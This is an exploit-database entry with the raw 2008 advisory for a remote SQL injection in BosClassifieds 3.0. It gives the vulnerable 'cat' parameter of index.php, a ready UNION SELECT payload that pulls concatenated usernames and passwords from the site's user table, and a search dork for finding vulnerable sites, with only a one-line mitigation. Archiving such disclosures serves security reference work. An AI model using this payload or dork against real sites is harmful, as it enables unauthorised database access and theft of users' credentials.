BosClassifieds 3.0 Remote Sql injection Exploit

vendor:

BosClassifieds

by:

SoSo H H

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: BosClassifieds

Affected Version From: BosClassifieds 3.0

Affected Version To: BosClassifieds 3.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

BosClassifieds 3.0 Remote Sql injection Exploit

BosClassifieds 3.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'cat' in the 'index.php' file. An example of a malicious SQL query is '-666 union select 1,2,concat(username,password)from bosdevUUS/*'

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

##############################################################################
##                                  !R4Q!4N H4CK3R
##
##  BosClassifieds 3.0 Remote Sql injection Exploit
##
##  By:SoSo H H(Iraqi-Cracker)
##
##  Script website:http://www.bosdev.com
##
##  Dork:"Powered by BosClassifieds Classified Ads System"
##
##############################################################################
## Affected Versoions:
## 
## BosClassifieds 3.0 ( Other Versions Maybe Affected, Not Sure  :)  )
##
##############################################################################
##
## Expl0it:
##
## site.c0m/bosclassifieds/index.php?cat=[SQL]
##
## Example:
##
## SQL:-666 union select 1,2,concat(username,password)from bosdevUUS/*
##
##############################################################################
## Greetz:My Sweet :X,El Mariachi,L!0N,-=Mizo=-,Shadow Administrator
##       Mini-Spider,and all My Friends.
##
##############################################################################

# milw0rm.com [2008-04-14]